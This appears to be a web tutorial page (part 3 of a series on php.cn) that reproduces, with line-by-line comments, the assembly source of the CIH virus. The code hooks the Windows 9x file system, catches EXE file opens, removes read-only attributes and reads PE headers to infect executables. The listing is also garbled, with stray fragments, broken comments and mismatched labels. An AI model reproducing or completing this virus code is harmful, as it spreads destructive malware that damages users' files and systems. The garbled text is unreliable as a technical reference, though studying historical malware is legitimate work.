jmp ExitRing0Init;Exit Ring0 level
;Merged code size
CodeSizeOfMergeVirusCodeSection = offset $
call @4
@4:
pop ebx ;Get the offset address of the current instruction
add ebx, FileSystemApiHook-@4 ;The difference plus the offset is equal to FileSystemApiHook Offset
Push ebx
int 20h; Call Vxd to remove the hook pointing to FileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h; Use eax, ecx, edx and flags registers
pop eax
eax
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ;Adjust OldFileSystemApiHook address
pop eax
pop ebx
# Push ad ;Save the register
@5 ;esi is the offset of FileSystemApiHook
;;The difference between the offset of VirusGameDataStartAddress and VirusGameDataStartAddress is equal to the offset of VirusGameDataStartAddress
;Test the "busy" flag, and "busy" goes to pIFSFunc
test byte ptr (OnBusy-@6)[esi], 01h
jnz pIFSFunc
; If the file is not open, go to prevhook
lea ebx, [esp+20h+04h+04h] ;ebx is the address of FunctionNum
;The calling format of the file system hook is as follows
;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,
;int ResourceFlags, int CodePage, pioreq pir)
;Determine whether this call is to open a file, if not, jump to the previous file hook
cmp dword ptr [ebx], 00000024h
jne prevhook
inc byte ptr (OnBusy -@6)[esi] ; Enable OnBusy ;Set the "Busy" flag to "Busy"
;Get the drive letter specified by the file path, and then put the drive name into the FileNameBuffer
;If the drive letter If it is 03h, it means that the drive is C drive
mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6 ;esi points to FileNameBuffer
push esi ;save
mov al, [ebx +04h] ;ebx+4 is the address of the disk number
;Is it a UNC (universal naming conventions) address? If so, transfer to CallUniToBCSPath
cmp al, 0ffh
je CallUniToBCSPath
Add al, 40h
mov ah, ':'
mov [esi], eax ; processed into the form of "X:", that is, add a colon after the drive letter
inc esi
inc esi
;Convert Canonicalized Unicode characters to ordinary BCS character set, call method
;UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath,
;unsigned int maxLength, int charSet)
CallUniToBCSPath:
push 00000000h ;Character set
push FileNameBufferSize ;Character length
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
Add eax, 04h
push eax ; Uni character first address
push esi ; BCS character first address
int 20h ; Call UniToBCSPath
UniToBCSPath = $
dd 00400041h Call id
add esp, 04h*04h
;Determine whether the file is an EXE file
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
;The following information is for debugging
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
;Judgment file Whether it exists, if not, go to DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
;Get the file attributes
mov ax, 4300h
int 20h ;The function of calling IFSMgr_Ring0_FileIO to obtain file attributes
IFSMgr_Ring0_FileIO = $
dd 00400032h ;Call number
jc DisableOnBusy
Push ecx
;Get IFSMgr_Ring0_FileIO address
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
; Determine whether the file is read-only, if so, modify the file attributes, otherwise go to OpenFile
Test cl, 01h
jz OpenFile
mov ax, 4301h
xor ecx, ecx
call edi ;Call IFSMgr_Ring0_FileIO to modify the file attributes to make the file writable
;Open the file
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx ;File attributes
xor edx, edx
inc edx
mov ebx, edx
inc ebx ;esi is the first address of the file name
call edi ;Call the function of IFSMgr_Ring0_FileIO to open the file
## test cl, 01h
jz IsOpenFileOK
;Restore file attributes
mov ax, 4301h
call edi;Restore file attributes
;Whether the file is opened successfully, if not , then turn to DisableOnBusy
IsOpenFileOK:
popf
jc DisableOnBusy
; The file is opened successfully
push esi; Push the first address of the file name data area onto the stack
pushf ;CF = 0, save flag
add esi, DataBuffer-@7 ;esi points to the first address of the data area
;Get the offset of the new file header
xor eax, eax
mov ah, 0d6h;IFSMgr_Ring0_FileIO's file reading function number (R0_READFILE)
;In order to minimize the length of the virus code, save eax to ebp
mov ebp, eax
Push 00000004h ; Read 4 bytes
pop ecx
push 0000003ch ; Read the Windows file header offset at DOS file header offset 3ch
pop edx
call edi ; Read File to esi
mov edx, [esi] ;Windows file header offset to edx
; Get the PE mark and infected mark of the graphic file header
dec edx
mov eax, ebp ; function number
call edi ; read file to esi
; Determine whether it is PE, if so, further determine whether it has been infected , if so, it will not be infected with Self-Extractor *
cmp dword ptr [esi], 00455000h; Determine whether it is a PE file (mark "PE/0/0")
jne CloseFile; If not, close the file
;Mark size
push edx ;edx points to PE file header offset 00h
push edi ;edi is the address of IFSMgr_Ring0_FileIO
mov dr1, esp ;Save esp
Entry
push eax
Read file header
mov eax, ebp
mov cl, SizeOfImageHeaderToRead To read 2 bytes
add edx, 07h For NumberOfSections (number of blocks)
call edi ;Read NumberOfSections (number of blocks) to esi
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ;File pointer
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax; Buffer address
;Put the value of edx to the beginning of the file virus code block table
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h] ;edx is the offset of the virus code block table
;Get the virus code block table The size of
mov al, SizeOfScetionTable ;The size of each block table entry
The number of blocks is equal to the size of the block table
; Set the virus code block table
lea esi, (StartOfSectionTable-@8)[esi]; esi points to the first address of the block table (in the virus dynamic data area)
The above is the content of virus program source code example analysis-CIH virus [3]. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
